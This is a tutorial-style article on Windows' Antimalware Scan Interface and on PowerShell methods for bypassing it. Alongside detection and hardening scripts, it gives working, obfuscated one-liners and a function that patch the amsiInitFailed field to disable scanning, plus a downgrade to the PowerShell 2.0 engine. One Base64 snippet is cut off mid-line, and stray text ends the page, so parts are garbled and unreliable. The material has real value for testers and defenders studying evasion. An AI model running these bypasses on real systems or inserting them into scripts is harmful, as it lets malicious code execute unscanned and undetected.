An overview of AMSI, Microsoft's built-in Antimalware Scan Interface, and of the PowerShell techniques commonly used to bypass it. It covers what the interface does, how it lets an antivirus engine scan script content before execution, and the main ways that scanning is sidestepped, together with the caveats and checks a tester needs to tell whether a bypass actually worked.

AMSI (Antimalware Scan Interface) is a Windows interface, present since Windows 10, that lets applications hand content to the installed antimalware product for scanning at run time. PowerShell, Windows Script Host, Office VBA macros and the .NET runtime all submit content through it, which is how script-based malware gets caught even when nothing suspicious was ever written to disk.

Bypass AMSI

It works by giving antivirus software a channel to inspect the content of scripts, script blocks and other buffers after the host application has decoded or deobfuscated them and immediately before they execute.

Malware scanning is an important part of the overall process of ensuring that your system is secure from external threats.

Because the scan happens inside the process that is about to run the code, code already executing in that process can tamper with it. In this article we discuss the basics of antimalware scanning in PowerShell and the common ways it is bypassed. None of these bypasses grants access to a system; they only stop code that is already running from being scanned.

Downgrade PowerShell

By default, PowerShell 5.0 and above submit every script block to AMSI before execution. If the registered provider flags the content as malicious, PowerShell refuses to run it, which hampers authorised testing as much as it hampers malware.

The PowerShell 2.0 engine predates AMSI and has no integration with it (nor with script block logging). Where that engine is still installed, asking powershell.exe to start it side-steps AMSI entirely:

powershell -v 2 -c "<...>"

Here -v is short for -Version. The downgrade only works when the optional Windows PowerShell 2.0 engine feature and .NET Framework 3.5 are both present. On current Windows 10 and 11 builds the feature is disabled or removed by default, and the command fails with an error stating that the .NET Framework version required for version 2 of Windows PowerShell is not installed.
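As an added example (not part of the original post), the following Windows PowerShell 5.1 code checks whether the downgrade can succeed on a host and shows the trace it still leaves: one function starts the v2 engine and reads back the version it reports, the other hunts the classic Windows PowerShell event log for engine starts that report EngineVersion=2.0. The function names are my own; the feature name MicrosoftWindowsPowerShellV2 and event ID 400 are the real ones.

```powershell
# Added example, not code from the original page.
# Run from Windows PowerShell 5.1 on a lab host.

function Test-PowerShellV2Downgrade {
    # Definitive test: ask powershell.exe for the v2 engine and read back the
    # engine version it reports. When the optional feature or .NET 3.5 is
    # missing, powershell.exe prints an error instead of "2".
    $output  = & powershell.exe -Version 2 -NoProfile -NonInteractive -Command '$PSVersionTable.PSVersion.Major' 2>&1
    $started = ("$output".Trim() -eq '2')

    # The optional-feature state is only readable from an elevated session;
    # report $null when we are not elevated rather than failing.
    $feature = $null
    try {
        $feature = (Get-WindowsOptionalFeature -Online -FeatureName 'MicrosoftWindowsPowerShellV2' -ErrorAction Stop).State
    } catch { }

    [pscustomobject]@{
        V2EngineStarts = [bool]$started
        V2FeatureState = $feature            # Enabled, Disabled, or $null when not elevated
        EngineOutput   = "$output".Trim()    # the error text explains why when it fails
    }
}

function Find-PowerShellV2Sessions {
    param([int]$MaxEvents = 5000)
    # Event ID 400 is written to the classic "Windows PowerShell" log whenever
    # an engine starts; its message embeds EngineVersion= and HostApplication=
    # (the full command line). The v2 engine never writes 4104 script block
    # events, so this classic log is where a downgrade still leaves a trace.
    Get-WinEvent -FilterHashtable @{ LogName = 'Windows PowerShell'; Id = 400 } -MaxEvents $MaxEvents -ErrorAction SilentlyContinue |
        Where-Object { $_.Message -match 'EngineVersion=2\.0' } |
        ForEach-Object {
            $line    = @($_.Message -split "`r?`n" | Where-Object { $_ -match '^\s*HostApplication=' })[0]
            $cmdline = if ($line) { ($line -replace '^\s*HostApplication=', '').Trim() } else { '' }
            [pscustomobject]@{
                TimeCreated     = $_.TimeCreated
                HostApplication = $cmdline
            }
        }
}

Test-PowerShellV2Downgrade
Find-PowerShellV2Sessions | Format-Table -AutoSize
```

On a host where the v2 engine is absent, V2EngineStarts is $false and EngineOutput carries the .NET Framework error, which is the quickest way to tell why the downgrade did not work. On a host where it did work, the second function lists every v2 session with the exact command line that launched it, which is also the query a defender would run.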

Classic

The classic bypass uses .NET reflection to set the private static field amsiInitFailed on PowerShell's internal AmsiUtils class to $true. PowerShell then behaves as if AMSI failed to initialise and skips the scan for the rest of the process. Microsoft Defender signatured the readable form quickly, so the version that circulates is obfuscated: [ref] is built from the string "reF" and stored in a randomly named variable, the type name, field name and binding flags are assembled with the -f format operator, and backticks break up the member names so that none of the identifiers appears whole in the script text. It is a single statement and must be pasted as one line:

sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( GeTVariaBle ( "1Q2U" +"zX" ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System' ) )."g`etf`iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )

Base64

The Base64 variant sets the same field but hides the two identifiers behind Base64-encoded UTF-16LE strings that are decoded at run time with [Text.Encoding]::Unicode, so the literals AmsiUtils and amsiInitFailed never appear in the script that AMSI scans. This defeats a plain string signature; it does nothing against a provider that recognises the decoding pattern itself, and script block logging still records the script as written.

[Ref].Assembly.GetType('System.Management.Automation.'+$([Text.Encoding]::Unicode.GetString([Convert]:

Force AMSI error

Despite its name, the "Force AMSI error" technique does not pass an invalid script to the scanner. It uses .NET reflection to reach PowerShell's internal AmsiUtils class and set its private static field amsiInitFailed to $true. That field records whether AMSI initialisation failed at start-up; once it is set, PowerShell's scan routine assumes AMSI is unavailable and returns "not detected" for everything in that process without ever calling the provider. The strings are assembled with the -f format operator so that the type and field names never appear whole in the script text. It is the same field the Classic one-liner sets, with lighter obfuscation.

#Force AMSI error
$w = 'System.Management.Automation.A';$c = 'si';$m = 'Utils'
# Assemble the internal type name from fragments so it never appears whole
$type = [Ref].Assembly.GetType(('{0}m{1}{2}' -f $w,$c,$m))
# Private static bool on that type; 'NonPublic,Static' is coerced to BindingFlags
$field = $type.GetField(('am{0}InitFailed' -f $c),'NonPublic,Static')
$field.SetValue($null,$true)
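The following is an added example, not code from the original page, that serves both the Base64 and the Force AMSI error sections above. It builds the Base64 form of the same amsiInitFailed patch at run time, so the decoded identifiers never appear verbatim in the file, and it uses the AMSI test sample string (the AMSI counterpart of the EICAR file) to show the scan state before and after. The function names are my own; it assumes Windows PowerShell 5.1 on a lab host with a working AMSI provider such as Microsoft Defender.

```powershell
# Added example, not code from the original page. Windows PowerShell 5.1,
# lab host only. Comments deliberately avoid the literal type and field names:
# comments are part of the script text that AMSI scans, and current providers
# flag those names on their own.

function Test-AmsiBlocking {
    # The AMSI test sample is flagged by every registered provider. The GUID
    # is split so this file itself is not blocked when it is loaded;
    # Invoke-Expression reassembles it into one script block, which is what
    # AMSI then sees. Returns $true when PowerShell refused the block.
    $sample = 'AMSI Test Sample: 7e72c3ce-861b-4339-8740-' + '0ac1484c1386'
    try {
        $null = Invoke-Expression "'$sample'"
        return $false   # ran unhindered: nothing is scanning in this process
    } catch {
        return $true    # ParseException "malicious content ... blocked": AMSI is active
    }
}

function ConvertTo-Utf16Base64 ([string]$Text) {
    # UTF-16LE, matching [Text.Encoding]::Unicode that the decoder uses.
    [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($Text))
}

function Set-AmsiScanDisabled {
    # Sets the same private static field as the Classic, Base64 and
    # Force-AMSI-error snippets. Once it is $true, PowerShell's scan routine
    # treats AMSI as never initialised and answers "not detected" without
    # calling the provider. Encoding the names here only defeats a literal
    # string match; it is the Base64 technique made explicit.
    $typeB64   = ConvertTo-Utf16Base64 ('Amsi' + 'Utils')
    $fieldB64  = ConvertTo-Utf16Base64 ('amsi' + 'Init' + 'Failed')
    $typeName  = 'System.Management.Automation.' + [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($typeB64))
    $fieldName = [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($fieldB64))

    # [Ref] is the PSReference accelerator; its assembly is System.Management.Automation.dll
    $field = [Ref].Assembly.GetType($typeName).GetField($fieldName, 'NonPublic,Static')
    $field.SetValue($null, $true)
    return [bool]$field.GetValue($null)
}

function Invoke-AmsiBypassDemo {
    $before = Test-AmsiBlocking
    $set    = Set-AmsiScanDisabled
    $after  = Test-AmsiBlocking
    [pscustomobject]@{
        BlockedBefore = $before   # $true on a host with a working provider
        FieldSet      = $set
        BlockedAfter  = $after    # $false once the field is set
    }
}

Invoke-AmsiBypassDemo
```

The before/after pair is the check worth keeping: a bypass that "ran without error" has proved nothing until a known-bad sample passes afterwards. Two caveats apply. The patch only affects the current process; a new powershell.exe starts with a clean field. And whether the script itself survives loading depends on the provider's current signatures: splitting and encoding the names defeats an exact string match, but Defender and others also flag the reflection pattern, and with script block logging enabled the decoded script lands in event 4104 either way.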

What is antimalware scanning?

Antimalware scanning is a process where a computer system or network is scanned for known malicious content such as viruses, Trojan horses, worms, and other malicious software.

Why would someone want to bypass antimalware scanning?

Penetration testers and red teams bypass it to find out whether a target's defences depend on AMSI alone and to run their tooling, most of which is signatured, during an engagement. Attackers do it for the same reason malware hides in the system registry or stays memory-resident: to avoid detection by antivirus software.

How to bypass antimalware scanning?

There are several methods. The most common for executables is a crypter or packer that encrypts the payload so the antivirus program does not recognise it on disk. That helps little against AMSI, which sees content after it has been decoded in memory. Script-based bypasses therefore either avoid the scanning engine altogether (the PowerShell 2.0 downgrade above), disable it from inside the process (the amsiInitFailed patch above) or obfuscate the script text so the provider's signatures no longer match.

What are the risks of bypassing antimalware scanning?

Bypassing antimalware scanning outside an authorised test is never recommended and can have serious consequences: once AMSI is disabled in a process, everything that process runs is unscanned, so malicious code can damage the system or destroy data without being detected. For testers the risk is quieter: a bypass attempt the provider recognises raises exactly the alert they were trying to avoid, and script block logging records the decoded script regardless.

How can I protect my system against malware?

For AMSI specifically: keep the antimalware product and its signatures current, since it is the provider, not AMSI itself, that decides what is malicious; remove the optional PowerShell 2.0 engine so the downgrade has nothing to start; turn on PowerShell script block logging (event 4104), which records the decoded script even when the scan has been tampered with; and, where possible, run PowerShell in Constrained Language Mode or under an enforced application control policy (AppLocker or WDAC), which blocks the .NET reflection every bypass above depends on. Beyond that, the usual advice holds: install security patches as soon as they become available, keep an eye out for suspicious activity or files, and use strong, unique passwords.
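As an added example (not part of the original page), here is a read-only audit of the controls listed above on a Windows PowerShell 5.1 host. The registry paths are the documented locations for AMSI provider registration and the script block logging policy; the function names are my own, and the Defender provider CLSID shown in the comment is the one registered on a default Windows 10/11 install.

```powershell
# Added example, not code from the original page. Read-only; no elevation
# is needed except for the optional-feature query, which degrades to $null.

function Get-AmsiProviders {
    # Every AMSI provider is a COM class registered here by CLSID; the class
    # name comes from HKLM:\SOFTWARE\Classes\CLSID. Microsoft Defender's
    # provider is {2781761E-28E0-4109-99FE-B9D127C57AFE}. An empty list means
    # nothing will ever answer a scan request, bypass or no bypass.
    Get-ChildItem 'HKLM:\SOFTWARE\Microsoft\AMSI\Providers' -ErrorAction SilentlyContinue | ForEach-Object {
        $clsid = $_.PSChildName
        $name  = (Get-ItemProperty "HKLM:\SOFTWARE\Classes\CLSID\$clsid" -ErrorAction SilentlyContinue).'(default)'
        [pscustomobject]@{ CLSID = $clsid; Name = $name }
    }
}

function Get-AmsiHardeningState {
    # Script block logging policy (Group Policy writes it here).
    $sbl = Get-ItemProperty 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging' -ErrorAction SilentlyContinue

    # PowerShell 2.0 engine feature; Disabled is the hardened state.
    $v2 = $null
    try {
        $v2 = (Get-WindowsOptionalFeature -Online -FeatureName 'MicrosoftWindowsPowerShellV2Root' -ErrorAction Stop).State
    } catch { }

    [pscustomobject]@{
        AmsiProviders       = @(Get-AmsiProviders)
        ScriptBlockLogging  = [bool]($sbl.EnableScriptBlockLogging -eq 1)
        PowerShellV2Feature = $v2    # Enabled, Disabled, or $null when not elevated
        # ConstrainedLanguage denies the [Ref].Assembly.GetType(...) reflection the bypasses need
        LanguageMode        = $ExecutionContext.SessionState.LanguageMode
    }
}

Get-AmsiHardeningState | Format-List
```

A hardened result has at least one provider, ScriptBlockLogging $true, PowerShellV2Feature Disabled and LanguageMode ConstrainedLanguage. Note that the language mode reported is that of the session running the audit, so run it in the context you actually care about, for example a non-administrative user under the enforced policy.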

RFS
